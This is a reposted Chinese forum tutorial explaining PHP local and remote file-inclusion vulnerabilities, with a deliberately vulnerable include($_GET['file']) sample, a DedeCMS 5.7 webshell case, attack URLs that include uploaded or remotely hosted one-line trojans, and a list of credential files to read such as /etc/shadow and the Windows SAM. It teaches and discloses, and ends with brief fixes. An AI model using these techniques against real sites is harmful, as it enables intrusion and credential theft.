美文网首页
Web安全之走进文件包含的世界

Web安全之走进文件包含的世界

作者: 池寒 | 来源:发表于2016-08-11 12:49 被阅读111次

    来源:http://bbs.ichunqiu.com/thread-9817-1-1.html?from=ch

    社区:i春秋

    时间:2016年8月9日22:42:00

    作者:LoneliNess

    前言

    俗话说:“知己知彼,方能百战不殆”,今天,小编就带着你们走进文件包含的世界,去进一步的了解它,深入它……………….如有错误,请你雅正!!

    目录

    第一节初识文件包含漏洞

    ·      1.1、 什么是包含

    ·      1.2、 文件包含漏洞是怎样产生的

    ·      1.3、 文件包含漏洞的分类

    第二节  详解PHP文件包含漏洞

    ·       1.4、解析PHP文件包含

    ·       1.5、文件包含实例及漏洞分析

    ·       1.6、常见的几种攻击手法

    ·       1.7、修复方案

    第三节 严正声明

    正文

    第一节初识文件包含漏洞

    1.1、 什么是包含

    程序猿常常把可以重复利用的函数写到单文件中,在使用一些函数时,直接调用,无须再次编写,这种过程呢,就称为包含

    1.2、   文件包含漏洞是怎样产生的

    程序猿为了让代码更灵活,会设置一些变量,用来动态调用,由于这种灵活,使客户端阔以调用一个恶意的文件,从而造成文件包含漏洞

    1.3、   文件包含漏洞的分类

    文件包含漏分为本地文件包含(Local File Inclusion)程文件包含(Remote FileInclusion)

    第二节  文件包含漏洞实例及常见的几种攻击手法

    1.4、   解析文件包含

    PHP文件包含漏洞涉及到的危险函数:

    include(),require()和include_once(),require_once()

    以上这些函数都阔以进行文件包含,但作用不同,区别如下:

    Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。

    Require:找不到包含文件产生致命错误,并停止脚本

    Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

    Require_once:这个函数跟require的区别 跟上面我所讲的include和include_once是一样的。所以我就不重复了。

    1.5、   文件包含实例及漏洞分析

    1)文件包含实例

    本次测试,服务器环境为:

    PHP  5.3.29

    Mysql  5.0.8

    Apache 2.4.18

    1 本地文件包含(LFI)

    小编写了一个test.php文件

    [AppleScript]纯文本查看复制代码

    ?

    1

    2

    3

    4

    5

    if(isset($_GET['file'])){

    $file=$_GET['file'];

    include $file;}

    ?>

    然后在写包含了一个phpinfo.txt进入文件内容是符合PHP语法的代码

    [AppleScript]纯文本查看复制代码

    ?

    1

    2

    3

    phpinfo();

    ?>

    之后的效果如图所示

    2 远程文件包含(RFI)

    小编在这里须强调的是远程文件包含,必须要确定PHP开启了远程包含功能选项,开启此功能须在PHP.ini配置文件中修改,成功后重启服务器生效

    即allow_url_include=on

    实例如下:

    www.xxxcom目录下存在1.txt,代码如下(PS:没有丝毫骂蛋总的意思):

    [AppleScript]纯文本查看复制代码

    ?

    1

    2

    3

    echo"yyyxy is a bad man"

    ?>

    在test.php中代码如下:

    [AppleScript]纯文本查看复制代码

    ?

    1

    2

    3

    4

    5

    if(isset($_GET['file'])){

    $file=$_GET['file'];

    include $file;}

    ?>

    访问url:http://www.xxxcom/test.php?file=http://localhost/1.txt

    2漏洞实例分析

    就拿Dedecms5.7 来讲解吧(PS:想听更好的讲解可以去i春秋官网学习)

    i春秋文件包含课程讲解地址:http://www.ichunqiu.com/course/51575

    广告打得有点生硬,第一次,不好意思……..

    这个漏洞主要由两个原因引起的,其中最重要的一个原因,便是开发者没有认识到Apache服务器解析文件的流程,从而导致安

    装文件在安装后居然可以被继    续访问。这里接单解释下Apache解析文件的流程:

    当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那    么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。

    那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞

    问题出在这里install/index.php.bak

    [AppleScript]纯文本查看复制代码

    ?

    01

    02

    03

    04

    05

    06

    07

    08

    09

    10

    11

    12

    13

    14

    15

    16[php]

    else if($step==11)

    {

    require_once(‘../data/admin/config_update.php’);

    $rmurl=$updateHost.”dedecms/demodata.{$s_lang}.txt”;

    echo $rmurl;

    $sql_content=file_get_contents($rmurl);

    $fp=fopen($install_demo_name,’w’);

    if(fwrite($fp,$sql_content))

    echo ‘  [√] 存在(您可以选择安装进行体验)’;

    else

    echo ‘  [×] 远程获取失败’;

    unset($sql_content);

    fclose($fp);

    exit();

    [/php]

    了解Dedecms参数机制的同学都知道,代码中的一些变量我们是可以通过GET参数的方式进行操控的。那么上面代码很明显,可以向指定的文件内写入任意内容,从而导致获取webshell

    如果想听更详细的讲解请到http://www.ichunqiu.com/course/51575

    1.6、   常见的几种攻击手法

    1)       本地包含配合上传拿shell

    大多数网站都会有上传功能,上传个图片,假设已上传图片一句话木马,路径为xxx/1.jpg,访问http://www.xxx.com/index.php?file=./xxx/1.jpg

    2)       远程包含拿shell

    这种应该非常少见了吧,目标主机必须保证allow_url_include=on情况,在http://***.com/根目录下有一个一句话木马的txt,访问http://www.xxx.com/index.php?file=http://***.com/muma.txt

    3)读取敏感信息

    访问url:http://www.xxx.com/index.php?file=/etc/my.conf

    如果存在本文件,他会读出文件的内容……..反之

    常见的敏感信息路径

    Windows系统

    c:\boot.ini                                                                  // 查看系统版本

    c:\windows\system32\inetsrv\MetaBase.xml               //  IIS配置文件

    c:\windows\repair\sam                                              //  存储Windows系统初次安装的密码

    c:\ProgramFiles\mysql\my,ini                                     //  MySQL配置

    c:\ProgramFiles\mysql\data\mysql\user.MYD             //  MySQL root

    c:\windows\php.ini                                                    //   php 配置信息

    c:\windows\my.ini                                                     //   MySQL 配置文件

    ......

    Linux/Unix系统

    /etc/passwd                                                                  //  账户信息

    /etc/shadow                                                                  //  账户密码文件

    /usr/local/app/apache2/conf/httpd.conf                          //   Apache2默认配置文件

    /usr/local/app/apache2/conf/extra/httpd-vhost.conf        //   虚拟网站配置

    /usr/local/app/php5/lib/php.ini                                        //  PHP相关配置

    /etc/httpd/conf/httpd.conf                                              //   Apache配置文件

    /etc/my.conf                                                                 //   mysql 配置文件

    1.7、  修复方案

    限制路径,禁止跳转字符,如:../

    把需要包含的页面固定写好,如:include(“test.php”)

    第三节 严正声明

    本文讨论的技术仅用于研究学习技术交流,严禁用于非法行为和破坏行为,否则造成的一切法律责任与作者以及本网站无关。

    本文原创作者:LoneliNess,转载须注明来自i春秋社区(BBS.ichunqiu.com)

    结束语:

    I春秋,你值得拥有!!不忘初心,方得始终!!!

    相关文章

      网友评论

          本文标题:Web安全之走进文件包含的世界

          本文链接:https://www.haomeiwen.com/subject/olfssttx.html